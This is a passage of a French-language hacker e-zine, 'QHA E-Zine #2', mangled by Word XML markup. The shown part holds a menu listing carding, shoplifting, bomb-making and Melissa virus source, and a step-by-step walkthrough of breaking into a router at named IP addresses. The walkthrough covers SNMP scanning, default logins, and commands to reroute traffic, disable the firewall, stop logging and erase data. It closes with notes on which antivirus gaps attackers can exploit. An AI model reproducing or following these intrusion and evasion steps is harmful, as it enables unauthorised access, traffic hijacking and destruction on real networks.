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             __                 __         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QQQQQQQQ\        |HH|              |HH|     /AAAAAAA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 |QQ|      |HH|              |HH|     |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      |HH|______|HH|     |AA|______|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_|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__   |QQQQ|       |HH|¯¯¯¯¯¯|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Q\      |HH|              |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QQ|     |HH|              |HH|     |AAA|       |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 xml:space="preserve">    "We Are Everywhere"</w:t>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Q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E-Zine #2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http://www.q-h-a.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                 dukester@hehe.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Introdu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Salut, bienvenue au e-zine #2 des Quebec Hacker's Alli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tant donné le retard du premier on a décidé de ratrapper le retard ave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n sortant le Zine #2 immediatement... Nous nous excusons du retard du</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 Dans ce e-zine pour eviter le chialage comme dans le #1 nous all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ettre que des article de niveau beaucoup plus avancé que dans le prem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es articles ont toutes été ecrit par Clad Strife (membres des QHA) pour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HA... le #3 sera contribuer par toute le crew par contre...  ce zine va par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 Anarchie Phreaking Hacking et Résea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Avertiss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Veuillez prendre note que tout ce qui est inscrit dans ce qui suit n'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qu'a but educatif. Les auteurs de ces articles retirent la responsabilite de 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que vous en faites. En bon quebecois "C pas notre probleme sti". Et avant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ontinuer n'oubliez pas que vous n'avez aucun droit de copier ces artic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HA Men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1  Hacking: hacker un routeur (étude du hacking d'un routeur),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2  Hacking: hacker un routeur (démonstration),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3  Réseaux: fonctionnement d'un réseau d'entreprise,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2.4  Comparatif: comparatifs des capacités de Firewalls(mars 1999), par Clad Strif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5  Décryptage passwords Linux et failles Multimania,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6  Piratage: la guerre des consoles et le piratage,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2.7  Vocabulaire: définitions des protocoles, par Clad Strif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2.8  Hacking: spoofing,par Clad Strif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2.9  Hacking: le sniffing, par Clad Strif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2.10 Anarchie: thème, par Clad Strif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2.11 Phreaking: le carding, par Clad Strif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2.12 Phreaking: PABX/VMB, par Clad Strif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2.13 Phreaking: le beige boxing, par Clad Strif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2.14 Anarchie: voler dans les grandes surfaces ,par Clad Strif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15 Anarchie faire des bombes ,par Clad Strife</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserv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16 Programmation: fichiers .bat  ,par Clad Strife</w:t>
        <w:tab/>
        <w:tab/>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2:17 Programmation: code soutrce melissa  ,par Clad Strife </w:t>
        <w:tab/>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18 Programmation: codes de programmes en Visual basic  ,par Clad Strife</w:t>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________________________________________________________________))==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rPr>
        <w:t>2.1 Hacker un routeur (étude), par Clad Strife</w:t>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1°/ Introduction. --&gt; By Clad Strife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2°/ Introduction aux modèles OSI. --&gt; By Clad Strife</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3°/ Les fonctions des couches OSI et le réseau. --&gt; By Clad Strife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4°/ les Routeurs et leurs hacking. --&gt; By Clad Strife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5°/ L'IP spoofing. --&gt; By Bond introduit par Clad Strife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1°/ Alors ce que tu vas trouver dans ce zine tu vas pas devoir l'appliquer etc... Pour preuve: un de mes potes travaille au SCSSI (Service Central de la Sécurité des Systèmes d'Information ), d'ailleurs le jour ou il va lire ce fichier il va m'déchirer et j'vais m'faire coffrer :-), et donc ce gars j'peux t'dire qu'il va pas s'f'aire chier si tu fais des bidouilles... Bon j'vais pas t'faire chier avec mes conneries...</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Tout ce que je te conseille c de ne pas appliquer ce qui est écrit ci dessous... d'ailleurs je donnerais plus d'informations techniques que d'astuces de hacking... Dans les prochains chapitres t'auras un maximum d'explications</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Courte intro... au fait (j'dis ça histoire de meubler la place qui m'reste), ci ce texte est en français c parce que les francophone en ont ras-l'bol de devoir lire des txt en english: la moitié des gens pigent rien (j'en sais quelquechose). Bon ce txt est protégé par le copyright: tu peux le modifier, écrire dessus, gribouiller, même chier dessus si ça t'amuses, mais tu mets mon nom ok??? Nan parce que sinon ça t'frais pas ieche toi d'savoir que ton boulot qu'il est pas reconnu? *comment ça non???*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Putain... j'temmerde avec mes paroles de merde alors que j'parle même pas de trucs intéressants??? eh ben j'fais ce que je veux tu piges?!? *** oh l'rebel!*** :) LoL! Au fait: ce zine est à moitié une pure déconnade mais saura garder son sérieux: alors ne prends pas tout au pied de la lettre! d'acc???</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2°/ Bon sang: faut que je r'devienne sérieux là... Nan parcequ'en fait ça va</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devenir corsé!!! Qu'est-ce qu'un modèle OSI... C'est un plan de base mis</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au point par l'ISO (International Standard Organization), qui définit comment</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seront envoyés les packets d'informations... Ce modèle est composé de 7 couches: la couche d'application, de présentation, de session, de transport, la couche réseau, la couche liaison et la couche physique! J'vais pas décrire à quoi sert chaque couche sinon t'en as pour des heures à l'finir ce txt. Alors on va juste s'intéresser aux 3 couches les plus basses (la 1, la 2 et la 3), donc la couche reseau, la couche liaison, la physique. Chacune de ces trois couches est en communication avec les autres couches de même nom d'un autre modèle OSI.</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œ La couche réseau: c'est ce qui permet de fournir les moyens d'établir, de maintenir et de libérer des connexions de réseau. Elle permet l'acheminement des packets d'informations via le réseau. L'adressage du réseau est fait par les routeurs. Donc les infos passent par les routeurs eux-mêmes... En devenant l'administrateur d'un routeur on peut en juger que: on peut recevoir les informations, détourner l'adressage du réseau, etc... En devenant l'administrateur d'un routeur on devient "l'BigBosss"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œ La couche Liaison et la couche Physique nous intéresse moins vu que c'est pas là qu'on y trouvera les routeurs ^_^</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Voilà comment se présente le modèle OSI en liaison avec un autre modèle OSI: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7 APPLICATION    |                |   APLICATION         |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6 PRESENTATION |               |   PRESENTATION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SESSION   5           |                |   SESSION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TRANSPORT 4     |                |   TRANSPORT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RESEAU    3           |------------|   RESEAU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LIAISON   2           |------------|   LIAISON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PHYSIQUE  1         |------------|   PHYSIQUE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Bon, un packet d'information va passer par chaque couche avant d'être envoyé via les couches de communications... Ces informations seront encapsulées (=enfermées), dans une "enveloppe"... Le protocole (le protocole X25 en fait) va définir la façon dont l'adresse va être écrite sur l"enveloppe"... En fait un protocole définit les règles d'adressage du packet de données.</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3°/ Bon je voulais passer les fonctions des couches mais mon pote me gueule dessus pour que j'te raconte leurs fonctions.</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on va même définir celle RESEAU, même que ça a été fait ci-haut. Mais abrégeons ^_^:</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œ La couche Application: elle gère le transfert d'informations entre programmes.</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œ La couche Présentation: elle s'occupe de la mise en forme des textes et des conventions d'affichage.</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œ La couche Session: elle s'occupe de l'établissement, de la gestion, de la coordination des communications.</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œ La couche Transport: elle gère la remise correcte des informations.</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œ La couche Réseau: elle détermine les routes de transport et s'occupe du traitement et du transfert de messages.</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œ La couche Liaison de données: elle s'occupe de du codage, de l'adressage, et de la transmission des informations.</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œ La couche Physique: elle gère les connections matérielles.</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4°/ OUEEEEE! enfin du pur de dur! Le routeur... Comme expliqué si haut il permet d'indiquer par ou va passer le réseau... (Cependant certaines entreprises offres d'autres services que vous pourrez consulter sur le net...) du moins c'est cette info qui nous intéresse car en devenant l'administrateur d'un routeur il est évident qu'on peut changer l'adressage du réseau, et ainsi de récupérer les informations de la plus haute importance * fantasme pas là! :) *, mais en devenant l'administrateur du réseau on est quasiment le MASTER DU SYSTEME!!!</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Hehem... bon le tout pour trouver l'adresse d'un routeur est d'abord de trouver le réseau nan? très simple... t'as l'url: www.perdu.com, merde comment avoir la liste des routeurs de perdu? Tu traces sous dos www.perdu de manière à avoir l'adresse IP du site: 207.181.252.100. Sur cette IP seul 207.181.252, ou 207.181 nous intéresse: c ça qui définit l'adresse du réseau... Ainsi on va scanner tout ce qui est sur ce réseau. De nombreux programmes font ça (le meilleur: WS PING PRO PACK sur http://www.ipswitch.com), et on en scannant uniquement ce qui est SNMP on a:</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207.181.252.095 SNMP</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207.181.252.161 SNMP</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207.181.252.191 SNMP</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207.181.252.192 SNMP</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207.181.252.193 SNMP</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207.181.252.223 SNMP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Pas trop puissant ça? Bien sur j'te déconseille encore une fois de déconner avec ça... enfin: te voilà prévenu. Maint'nant si tu t'en pètes les couilles :)) Eh oui car chaque connexion OU tentative de connexion est enregistrée avec ton IP... Rien n'est simple... C'est pour ça qu'il existe le spoofing!!! Kézako??? Tu veux l'savoir??? Bof, c simple, mais j'vais t'expliquer ça dans les prochains chapitres. Now je vais t'expliquer:</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comment te connecter à un routeur.</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sous quel environnement.</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que faire sur le routeur.</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Comment se connecter à un routeur: c simple. Une fois que t'as trouvé l'adresse d'un routeur: tu te connectes à lui via telnet sur le port SNMP. Ensuite tu vas devoir utliser TES méthodes (chacun ses méthodes) pour trouver les passwords et les pass. Moi pour les logins je fais un lookup de l'adresse IP, pour les pass utilisez l'art du sniffing. Sous quel environnement??? (j'lavais oublié cette question là!) telnet bien sur!</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Voilà un exemple de logins à trouver:</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admin</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local-admin</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webmaster</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administrateur</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rooter</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root</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etc...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708"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8"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Hacker un routeur (démonstration), par Clad Strife</w:t>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n va pas reprendre tous les principes d'un routeur et des réseaux, tout est déjà écrit dans le précédent chapit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ici on va donner des exemples concrets, d'un vrai hack réalisé sur un vrai routeur, et on va faire du "étape par étape", et on va pas se lancer dans des explications astronomiques... En fait vous d'après vos remarques déposés un peu partout, les zines sont pas assez concret: on y explique comment faire mais rien, aucun exemple que ça marche etc... Bon on va remédier à ça hein? Bref je parle trop, allez on se lance. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ETAPE N°1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Repérer un réseau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Quand on se charge de repérer un réseau on prend un réseau qui supporte un serveur style merdique (perdu.com fera l'affaire!), ainsi on peut espérer que le réseau ne sera pas aussi bien protégé que les réseaux important (quand on parle de réseaux on parle de routeurs, c'est ça notre but). L'IP du site perdu.com est: 207.181.252.100, l'ID du réseau est donc 207.181. Et comme on veut pas se faire chier à scanner tout le réseau on va prendre 207.181.252, et si rien ne répond on fera sur 207.181.251, ...250, ...249.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our scanner on prend son outil favori (j'utilise WS PING PRO PACK sur www.ipswitch.com), on va dans scanner, et on met les ID du réseau: 207.181.252.1, et la fin prenez une petite marge sinon ça risque de planter, exemple: 249.1.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à j'ai commencé un scan mais j'ai arrêté pour ne pas avoir trop de réponses... Quand on scanne pour trouver des routeurs, on coche la case SNMP, ce qui veut dire que tout les routeurs SNMP répondront... </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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ETAPE N°2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trouver le login et password du routeur ciblé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Bon, quand on va se connecter sur le routeur (par telnet bien sur!), la configuration à prendre est sans appel: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Nom d'hôte: l'adresse IP de la cibl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Port: SNMP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Type de terminal: vt100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On se connecte, et là 3 possibilités, vous tombez sur un routeur qui demande ni login ni pass et qui au bout de quelques secondes vous déconnecte: laissez tomber l'affaire, celui-ci fait du filtering (d'IP, de local Host, ou bien c'est qu'il faut des progs pour s'auto-identifier auprès du serveur). </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Deuxième possibilité: vous êtes bien sur un routeur, mais on ne vous demande ni login ni pass, il y a 95% de chances que vous soyez tombé sur un routeur qui ne le demande pas à juste titre car vous êtes sur une machine en accès restreint: on peut pas faire tout ce qu'on veut... (Pour éviter les risques de piratages, certains services font ça, ça évite que si quelqu'un se connecte il rentre un login et pass au hasard). Et donc pour saisir un login et/ou pass, faut taper "?" (sans les guillemets) pour avoit la liste des commandes ou bien "help"; et en général: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OGIN lelogin PASSWD lepassword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ou encor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USER lenomd'user (tapez enter)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PASS lepasschoisi (tapez enter)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Mais n'hésitez pas à consulter l'help en tapant "?" ou "help". Donc là j'ai pas eu besoin de faire du Social E., pour avoir le pass: trop simple! :-) L'IP du routeur cible était 207.181.252.31... Les fonctions des commandes seront expliquées ultérieurement. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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ETAPE N°3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> hacker le routeur, commandes, fonctions et options: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Une fois que vous avez accès total au routeur vous avez foule de répertoires et d'options, on va à peu près tous les détailler: bien sur il existe d'autres options et d'autres répertoires sur d'autres types de routeurs; d'autres types de présentation et de fonctionnement, mais celà va vous donner une idée générale de ce que vous pouvez fair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iste des répertoires (dans chaque repertoire des commandes ou des sous-répertoires sont visitables et éxécutables):</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filter</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xit</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s</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elete</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ync</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pifs</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pxsaps</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th</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remote</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hcp</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help</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ogin</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reboot</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opy</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rename</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sfs</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proutes</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i</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sav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all</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version</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ogout</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em</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ir</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format</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fs</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pxroutes</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ystem</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rase</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ing</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Je vais expliquer ce que vous pouvez faire d'important pour faire un maximum de saloperies sur un maximum de ces versions de routeurs. Au fait: si une commande est validé, il n'y aura pas de messages de confirmation pour certaines applications.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Je mets des "/" pour indiquer un nouveau répertoire, remplacez ce signe par un espac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xempl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filter br use, j'écrirais filter/br/use </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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filter/br: vous avez plusieurs options, pour magouiller faites filter/br/use et choisissez vos options. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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exit: ne pas le faire pour ne pas se faire déconnecter. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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ps: je ne sais pas trop, ça semble indiquer ce qui existe (?)... </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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delete: sert à deleter des files. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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sync: fait un "syncing files" (?), j'évite de le faire. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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ipifs: Donne un aperçu des routeurs ajouté (quoique...?) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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ipxsaps: désactive ipxsaps si activé et vice-versa. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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eth/ip/sub-commands: permet l'ajout de routeurs!! Intéressant quand on sait qu'on peut faire du détournement de trames, en indiquant un routeur très proche de l'émetteur! Exemple:</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th ip addroute 216.33.151.7 216.33.151.7 207.181.249.0 1 com1</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onc là j'ai bien indiqué un autre routeur . Vous pouvez même faire l'art du spoofing en vous faisant passer pour routeur! </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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eth/ip/options: vous pouvez désactiver quelques trucs, rien que pour faire chier les administrateurs.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Je vais pas décrire ce que vous avez à faire: le reste parle de lui même. Dans le plus pur style, j'nique les firewalls et les configurations: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th ip firewall off</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th ipx disable</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th ip defgateway 207.181.249.1</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Regardez: firewall désactivé, et le reste des p'tites bidouilles quelquonques pour agir sur le système d'IP ethernet (j'sais pas si ce que je dis a un sens, mais on s'comprend :-)).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On va passer quelques répertoires, sinon le reste important: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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login: après avoir tapez login tapez à la suite avec un espace un nouveau mot de passe: exemple: "login reta" </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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system/log: à la suite de system log tapez "stop", exemple: "system log stop". simple et efficace pour ne plus se faire logger! </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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system/history: le plus dangereux, j'ai pas trouvé de parade... Sachez que l'history affiche ce que chaque personne (symbolisée par un IP), a fait comme commande et si celles-ci ont abouti, de plus, ce qui arrive, rentre sort, et est en attente est indiqué!!! </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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sur certains routeurs vous avez l'option format dans l'index: ça sert à faire un formatage! tapez "format" et suivez l'(les)instruction(s). </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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boot: si vous voulez qu'un hack soit efficace... Le reboot change la location du routeur, mais réinitialise le routeur selon vos paramètres. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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erase: pour effacer. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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version: pour avoir la version du routeur. </w:t>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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Après un bon hack à la lumière de votre ordinateur, voilà un aperçu du résultat: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FlowPoint/2000 ADSL Routeur v1.2.3 ready</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gt; login clad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="1136" w:leader="none"/>
          <w:tab w:val="left" w:pos="2414" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t># Logged in sucessfully!</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Avant de finir cet article j'aimerais expliquer d'ou vient la faille de ce système. En fait c'est parce que le système d'administration du réseau demande un nouveau password périodiquement! L'admin le rechange pas et il se peut qu'il prenne celui par défaut. Ici c'était </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</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8"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Fonctionnement d'un réseau d'entreprise, par Clad Strife</w:t>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vous connaissez tout, ou à peu près tout, sur les manières basiques de pénétrer un systèm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n va les re-énumérer, car il y en a de nombreuses que l'on oublie. Pour faire jouer la sécurité d'un réseau il s'agit de connaitre toutes ces méthodes: si vous n'en connaissez qu'un tiers ou un quart, vous irez pas très loin (c'est chiant à dire mais c'est vrai). </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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taque par virus, vers, bombes logicielles </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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ntrusion par Horse Trojan (ou Cheval de Troie) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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ntrusion par portes dérobées: le créateur d'un programme, cré une faille qu'il est sur d'être le seul à exploiter. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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ntrusion par spoofings de packets (on peut voir ça dans hacking d'un routeur en images), quand on usurpe une adresse IP qui est reconnue comme faisant partie du réseau, ou par d'autres méthodes de spoofings, cf article: "spoofing" </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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spionnage de liaisons ou analyses de trafic: détournement de trames qui circulent sur le réseau, avec ça on peut intercepter des mots de passe </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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ntrusions par les bugs des logiciels </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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ploitation d'accès non sécurisés: quand on demande un mot de passe style 1234, on quand on n'en demande pas! </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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efus d'accès, saturation de services (DENI de services), en général quand on empêche l'accès à une ressource par flooding (!), ou bien parce que les pass ont changés (Cf: hack d'un routeur) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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ransparence excessive des annuaires: on ne vous cache rien, c'est quand vous faites des infos requests d'un domaine sur NetworkSolutions, pour choper les infos des dirigeants d'une entreprise, ou bien par l'annuaire: plus simple. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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urveillance des messageries d'entrepris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Quand on ouvre son réseau d'entreprise sur l'internet, les admins ("vive eux" hehem!!) des réseaux se gênent pas de tout sécuriser (remarquez qu'ils sont là pour ça, et que nous on est là pour faire le contraire). Donc sur un réseau intranet d'entreprise, il y a un poste avec un modem qui a un firewall ET anti-virus activé en permanence (dans quel monde vit-on), et des paramètrages de sécurité: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Pas d'utilisation de type libre (on peut pas faire ce qu'on veu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On ne peut pas maitriser la sécurité (impossible de désactiver l'anti-virus par exemp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 pour rejoindre ce poste au réseau internet les trames passent par un RTC( Réseau Téléphonique Commuté) ou un RNIS (Réseau Numérique à Intégration de Services), puis par un modem relié à l'ISP puis à interne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e autre solution de sécurité pour protéger le LAN privé (comprenez réseau interne), consiste à mettre un routeur filtrant entre le LAN et l'ISP... celui-ci fait un filtrage sur les champs des protocoles de communacation (style UDP, IP, TCP...). C'est en général la solution choisie par de nombreux d'administrateurs. Mais ça leur demande une bonne connaissance des protocoles. Ainsi il y a 3 caractéristiques à ces routeur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Connaissance des protocoles exigé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Pas de logs/statistiques d'exploitabl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routeur avc une syntaxe de bas niveau (c'est pas hard à utilis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 comme j'explique comment vous les farcir... Devrait pas y avoir trop de problèm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roisième solution pour la sécurité, le firewall EN PLUS du routeur filtrant ... Les deux feront: du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filtrage sur les protocoles de communication (donc les trames louches qui sont régies par ces protocoles ne seront pas accepté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filtrage sur les application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filtrage sur les utilisateur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fichiers logs et statistiques d'utilisati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gestion possible de réseaux complex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n peut aussi mettre le firewall sur le réseau interne, comme ça les clients (comprenez que le serveur est celui qui reçoit et le client qui arrive, comme avec Back Orifice: le programme boserve, tarnsforme votre machine en serveur) se font identifier par le serveur grace au firewal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n va pas exliquer comment marche un firewall, mais c'est simple: il reçoit la trame, regarde si c'est bien une trame correspondant aux règles prédéfinies par les administrateurs, et ensuite transmet ou non, la trame à la machine cible. C'est pratique et fiable quand on a un réseau important à sécuriser... Mais ça peut poser des inconvénients (Si un inconnu est sur une machine du réseau, et donc reconnu comme ami, il peut niquer tout le reste du réseau sans que le firewall agisse). C'est pour ça que certains firewall ont des fonctions de demande de confirmation d'acceptation du paquet par la machine cible, mais en général désactivé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utres trucs plus dangereux pour les hackers; certains firewalls font du CVP (Content Vectoring Protocol) avec les trames envoyées par n'importe qui, ce qui veut dire que le firewall adresse d'abord les trames à un autre serveur, ou à un autre routeur ou antivirus. Ben c'est là le problème c'est qu'en général c'est un anti-virus qui est le centre de réadressage des trames... ce qui veut dire que quelle que soit la trame, si y'a un virus connu dedans vous êtes grillé et ils ont votre IP!! argh! Ces antivirus fonctionnent en général à 2 en même temps. Les plus connus sont Trend Interscan VirusWall, et Norton Antivirus for Firewalls. Heureusement pour vous j'ai fait un comparatif de leurs capacités plus tard dans mon zine, vous allez donc savoir quoi envoyer! Bref, après vérification de la trame, l'antinvirus la ré-envoye au firewall, qui la retransmet ou non, au serveu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utre forme de filtrage par CVP c'est celle du flux http, l'Hyper Text Transfer Protocol (toutes requêtes http demandées). Voilà étape par étape ce qui se pass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Requête proxy http du client vers le proxy cache (ça va du port 1023 à 80. 80 est le port de navigation par défau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Requête http du proxy cache vers le serveur (requête interceptée par le firewal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Requête http du firewall vers le serveur (le firewall se comporte comme un proxy de $#@!/&amp;*µ!)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Réponse http du serveur vers le "proxy-firewall" (qui fait proxy à ses heures perdues :-)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Echange CVP pour analyse virale du firewall vers le(s) antivir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Réponse du firewall vers le proxy cache, puis vers le premier envoyeur de la request, c'est à dire vo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l en faut du monde pour si peu vous allez me dire. C'est quand même bien pratique pour sécuriser son serveur quand on essaye d'aller dans des sous-dossiers dont l'accès est interdit à tout étranger, ou même au scripts cgi. C'est par là que tout commence pour voir si leur réseau est bien sécurisé...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administrateurs d'un réseau interne supportant un serveur, peuvent aussi remplacer le firewall par un serveur proxy... Ca marche à peu près pareil, sauf que c'est plus efficace pour les requêtes http (car transmission plus rapides, grâce au cache), mais en général les administrateurs prennent les deux le proxy s'occupant principalement des requêtes http (faut bien comprendre tout celà).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NCLUSION: la solution que tous les administrateurs devraient choisir mais qu'ils ne font pas forcément c'est celle c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N privé protégé par un firewall qui est connecté à un proxy anti-virus, et un deuxième à un proxy cache (ceci hors connexion internet). Ce même firewall (dans le continuité de la connection vers internet) est connecté à un routeur filtrant, puis au reste (ISP et son modem).</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708" w:leader="none"/>
        </w:tabs>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4 Comparatifs des capacités de FireWalls, par Clad Strife</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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SYMANTEC NORTON ANTIVIRUS FOR FIREWALLS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cherche les virus sur le: HTTP, SMTP, FTP.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recherche pas de magouilles sur les Applets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fait recherche les certificats (intéressant)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recherche pas de signatures (intéressant)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recherche pas les sources (intéressant)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filtre pas les E-mails (intéressant)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fait pas de gestionnaire de délivrance de courrier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Pas d'OPSEC Compliant (NT)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Pas d'OPSEC Compliant (UNIX)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fait pas de filtrage d'adresses url (intéressant)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fait pas de filtrage de spamming (haha!)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Il ne bloque pas les cookies (intéressant)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Les algorithmes de compression supportés: ARJ, ZIP </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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détecte pas l'e-mail spoofing (intéressant) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
